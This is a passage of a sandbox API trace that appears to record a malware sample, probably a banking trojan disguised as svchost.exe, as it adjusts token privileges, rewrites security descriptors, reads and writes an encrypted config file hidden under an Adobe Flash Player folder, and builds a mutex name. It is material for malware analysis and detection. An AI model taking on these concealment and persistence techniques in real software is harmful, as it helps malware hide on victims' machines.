0x11 [0120.997] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0120.997] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0120.997] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0120.997] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0120.997] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0120.998] GetCurrentThread () returned 0xfffffffe [0120.998] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x0) returned 0 [0120.998] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x1cc) returned 1 [0120.998] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f26c | out: lpLuid=0x735f26c*(LowPart=0x8, HighPart=0)) returned 1 [0120.999] AdjustTokenPrivileges (in: TokenHandle=0x1cc, DisableAllPrivileges=0, NewState=0x735f268*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0120.999] GetLastError () returned 0x0 [0120.999] CloseHandle (hObject=0x1cc) returned 1 [0121.000] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.000] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298 | out: lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298) returned 1 [0121.000] SetNamedSecurityInfoW () returned 0x0 [0121.023] LocalFree (hMem=0x52142e0) returned 0x0 [0121.023] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0121.023] GetCurrentThread () returned 0xfffffffe [0121.023] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x0) returned 0 [0121.023] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f264 | out: TokenHandle=0x735f264*=0x1cc) returned 1 [0121.023] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f26c | out: lpLuid=0x735f26c*(LowPart=0x8, HighPart=0)) returned 1 [0121.025] AdjustTokenPrivileges (in: TokenHandle=0x1cc, DisableAllPrivileges=0, NewState=0x735f268*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.025] GetLastError () returned 0x0 [0121.026] CloseHandle (hObject=0x1cc) returned 1 [0121.026] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.026] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298 | out: lpbSaclPresent=0x735f29c, pSacl=0x735f290, lpbSaclDefaulted=0x735f298) returned 1 [0121.026] SetNamedSecurityInfoW () returned 0x0 [0121.027] LocalFree (hMem=0x52142e0) returned 0x0 [0121.027] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0121.028] GetFileSizeEx (in: hFile=0x1cc, lpFileSize=0x735f2b0 | out: lpFileSize=0x735f2b0*=1040) returned 1 [0121.028] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x50d0000 [0121.028] ReadFile (in: hFile=0x1cc, lpBuffer=0x50d0000, nNumberOfBytesToRead=0x410, lpNumberOfBytesRead=0x735f2bc, lpOverlapped=0x0 | out: lpBuffer=0x50d0000*, lpNumberOfBytesRead=0x735f2bc*=0x410, lpOverlapped=0x0) returned 1 [0121.030] CloseHandle (hObject=0x1cc) returned 1 [0121.031] wvnsprintfA (in: pszDest=0x5413748, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366202") returned 10 [0121.032] wvnsprintfA (in: pszDest=0x54137a8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0121.033] wvnsprintfA (in: pszDest=0x54136a8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0121.034] wvnsprintfA (in: pszDest=0x54136a8, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0121.035] wvnsprintfA (in: pszDest=0x5413788, cchDest=21, pszFmt="%d", arglist=0x735f200 | out: pszDest="1476366203") returned 10 [0121.036] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0121.038] WriteFile (in: hFile=0x1cc, lpBuffer=0x5401b70*, nNumberOfBytesToWrite=0x50e, lpNumberOfBytesWritten=0x735f2b4, lpOverlapped=0x0 | out: lpBuffer=0x5401b70*, lpNumberOfBytesWritten=0x735f2b4, lpOverlapped=0x0) returned 1 [0121.039] CloseHandle (hObject=0x1cc) returned 1 [0121.044] ReleaseMutex (hMutex=0x1b8) returned 1 [0121.044] CloseHandle (hObject=0x1b8) returned 1 [0121.044] SetLastError (dwErrCode=0x0) [0121.044] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Fabo", ulOptions=0x0, samDesired=0x1, phkResult=0x735f5ac | out: phkResult=0x735f5ac*=0x1b8) returned 0x0 [0121.044] RegQueryValueExW (in: hKey=0x1b8, lpValueName="Onpiwaad", lpReserved=0x0, lpType=0x735f5d8, lpData=0x0, lpcbData=0x735f5bc*=0x0 | out: lpType=0x735f5d8*=0x0, lpData=0x0, lpcbData=0x735f5bc*=0x0) returned 0x2 [0121.044] RegCloseKey (hKey=0x1b8) returned 0x0 [0121.044] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\Desktop (create shortcut).igb" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\desktop (create shortcut).igb"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0121.045] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x735f5b0 | out: lpFileSize=0x735f5b0*=0) returned 1 [0121.045] CloseHandle (hObject=0x1b8) returned 1 [0121.045] GetLastError () returned 0x0 [0121.045] GetLastError () returned 0x0 [0121.045] GetLocalTime (in: lpSystemTime=0x735f5c0 | out: lpSystemTime=0x735f5c0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x1cf)) [0121.045] GetCurrentThreadId () returned 0xd70 [0121.045] GetCurrentProcessId () returned 0x2ec [0121.045] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f564 | out: pszDest="[13.10.2016 15:43:23] ver=2.2.5, log=0x0011, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0121.045] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="DynamicConfig::getCurrent %u get crypted error %u.", arglist=0x735f5e0 | out: pszDest="DynamicConfig::getCurrent 1 get crypted error 0.") returned 48 [0121.045] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0011, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0121.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0011, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x5416030, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0011, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0121.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0011, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 134 [0121.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0011, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", cchWideChar=134, lpMultiByteStr=0x54166f0, cbMultiByte=135, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0011, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: DynamicConfig::getCurrent 1 get crypted error 0.", lpUsedDefaultChar=0x0) returned 134 [0121.046] GetSystemTime (in: lpSystemTime=0x735f1b0 | out: lpSystemTime=0x735f1b0*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x1cf)) [0121.046] SystemTimeToFileTime (in: lpSystemTime=0x735f1b0, lpFileTime=0x735f1a0 | out: lpFileTime=0x735f1a0) returned 1 [0121.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.047] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x5412138, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0121.047] GetUserNameExW () returned 0x1 [0121.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0121.050] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413368, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0121.050] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="8A") returned 2 [0121.050] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0121.050] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0121.050] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="00") returned 2 [0121.050] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="B7") returned 2 [0121.050] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="49") returned 2 [0121.051] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="67") returned 2 [0121.051] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="98") returned 2 [0121.051] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="F6") returned 2 [0121.051] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="14") returned 2 [0121.051] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="59") returned 2 [0121.051] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="35") returned 2 [0121.051] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="AA") returned 2 [0121.051] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="3E") returned 2 [0121.051] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="27") returned 2 [0121.051] wvnsprintfW (in: pszDest=0x735ef98, cchDest=6, pszFmt="%02X", arglist=0x735ef74 | out: pszDest="60") returned 2 [0121.051] CreateMutexW (lpMutexAttributes=0x4ece89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x1cc [0121.051] WaitForSingleObject (hHandle=0x1cc, dwMilliseconds=0xffffffff) returned 0x0 [0121.087] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0121.087] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0121.087] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0121.087] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0121.087] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming") returned 0x10 [0121.088] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe") returned 0x10 [0121.088] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 0x10 [0121.088] GetCurrentThread () returned 0xfffffffe [0121.088] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x0) returned 0 [0121.088] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x1b8) returned 1 [0121.088] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f204 | out: lpLuid=0x735f204*(LowPart=0x8, HighPart=0)) returned 1 [0121.089] AdjustTokenPrivileges (in: TokenHandle=0x1b8, DisableAllPrivileges=0, NewState=0x735f200*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.089] GetLastError () returned 0x0 [0121.089] CloseHandle (hObject=0x1b8) returned 1 [0121.089] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.089] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x5214130, lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230 | out: lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230) returned 1 [0121.089] SetNamedSecurityInfoW () returned 0x0 [0121.099] LocalFree (hMem=0x5214130) returned 0x0 [0121.099] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned 0x20 [0121.099] GetCurrentThread () returned 0xfffffffe [0121.099] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x20, OpenAsSelf=0, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x0) returned 0 [0121.099] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x735f1fc | out: TokenHandle=0x735f1fc*=0x1b8) returned 1 [0121.099] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x735f204 | out: lpLuid=0x735f204*(LowPart=0x8, HighPart=0)) returned 1 [0121.100] AdjustTokenPrivileges (in: TokenHandle=0x1b8, DisableAllPrivileges=0, NewState=0x735f200*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0121.100] GetLastError () returned 0x0 [0121.100] CloseHandle (hObject=0x1b8) returned 1 [0121.100] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1 [0121.100] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x52142e0, lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230 | out: lpbSaclPresent=0x735f234, pSacl=0x735f228, lpbSaclDefaulted=0x735f230) returned 1 [0121.100] SetNamedSecurityInfoW () returned 0x0 [0121.102] LocalFree (hMem=0x52142e0) returned 0x0 [0121.103] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0121.103] GetFileSizeEx (in: hFile=0x1b8, lpFileSize=0x735f248 | out: lpFileSize=0x735f248*=1584) returned 1 [0121.103] VirtualAlloc (lpAddress=0x0, dwSize=0x630, flAllocationType=0x3000, flProtect=0x4) returned 0x50d0000 [0121.103] ReadFile (in: hFile=0x1b8, lpBuffer=0x50d0000, nNumberOfBytesToRead=0x630, lpNumberOfBytesRead=0x735f254, lpOverlapped=0x0 | out: lpBuffer=0x50d0000*, lpNumberOfBytesRead=0x735f254*=0x630, lpOverlapped=0x0) returned 1 [0121.106] CloseHandle (hObject=0x1b8) returned 1 [0121.106] wvnsprintfA (in: pszDest=0x54138e8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366202") returned 10 [0121.108] wvnsprintfA (in: pszDest=0x54138a8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0121.108] wvnsprintfA (in: pszDest=0x5413908, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0121.109] wvnsprintfA (in: pszDest=0x5413a28, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0121.110] wvnsprintfA (in: pszDest=0x5413928, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0121.112] wvnsprintfA (in: pszDest=0x5413888, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0121.113] wvnsprintfA (in: pszDest=0x54138a8, cchDest=21, pszFmt="%d", arglist=0x735f198 | out: pszDest="1476366203") returned 10 [0121.114] CreateFileW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" (normalized: "c:\\users\\wi2yhmti onvscy7pe\\appdata\\roaming\\adobe\\flash player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b8 [0121.116] WriteFile (in: hFile=0x1b8, lpBuffer=0x5404210*, nNumberOfBytesToWrite=0x732, lpNumberOfBytesWritten=0x735f24c, lpOverlapped=0x0 | out: lpBuffer=0x5404210*, lpNumberOfBytesWritten=0x735f24c, lpOverlapped=0x0) returned 1 [0121.117] CloseHandle (hObject=0x1b8) returned 1 [0121.349] ReleaseMutex (hMutex=0x1cc) returned 1 [0121.349] CloseHandle (hObject=0x1cc) returned 1 [0121.349] SetLastError (dwErrCode=0x0) [0121.350] GetLastError () returned 0x0 [0121.350] GetLocalTime (in: lpSystemTime=0x735f630 | out: lpSystemTime=0x735f630*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x2f8)) [0121.350] GetCurrentThreadId () returned 0xd70 [0121.350] GetCurrentProcessId () returned 0x2ec [0121.350] wvnsprintfW (in: pszDest=0x54020f0, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x735f5d4 | out: pszDest="[13.10.2016 15:43:23] ver=2.2.5, log=0x0012, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: ") returned 86 [0121.350] wvnsprintfW (in: pszDest=0x540219c, cchDest=1962, pszFmt="updateplugin: No plugin url.", arglist=0x735f650 | out: pszDest="updateplugin: No plugin url.") returned 28 [0121.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0012, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 114 [0121.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0012, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x5403100, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0012, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", lpUsedDefaultChar=0x0) returned 114 [0121.350] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0012, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 114 [0121.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0012, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", cchWideChar=114, lpMultiByteStr=0x54015f0, cbMultiByte=115, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:43:23] ver=2.2.5, log=0x0012, PID=0x02EC, TID=0x0D70, LE=0(0x0)\r\nINFO: updateplugin: No plugin url.", lpUsedDefaultChar=0x0) returned 114 [0121.351] GetSystemTime (in: lpSystemTime=0x735f220 | out: lpSystemTime=0x735f220*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2b, wSecond=0x17, wMilliseconds=0x2f8)) [0121.351] SystemTimeToFileTime (in: lpSystemTime=0x735f220, lpFileTime=0x735f210 | out: lpFileTime=0x735f210) returned 1 [0121.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0121.351] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x54120a8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0121.399] GetUserNameExW () returned 0x1 [0121.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0121.400] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x5413088, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0121.401] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="8A") returned 2 [0121.401] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0121.401] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0121.401] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="00") returned 2 [0121.401] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="B7") returned 2 [0121.401] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="49") returned 2 [0121.401] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="67") returned 2 [0121.401] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | out: pszDest="98") returned 2 [0121.402] wvnsprintfW (in: pszDest=0x735f008, cchDest=6, pszFmt="%02X", arglist=0x735efe4 | 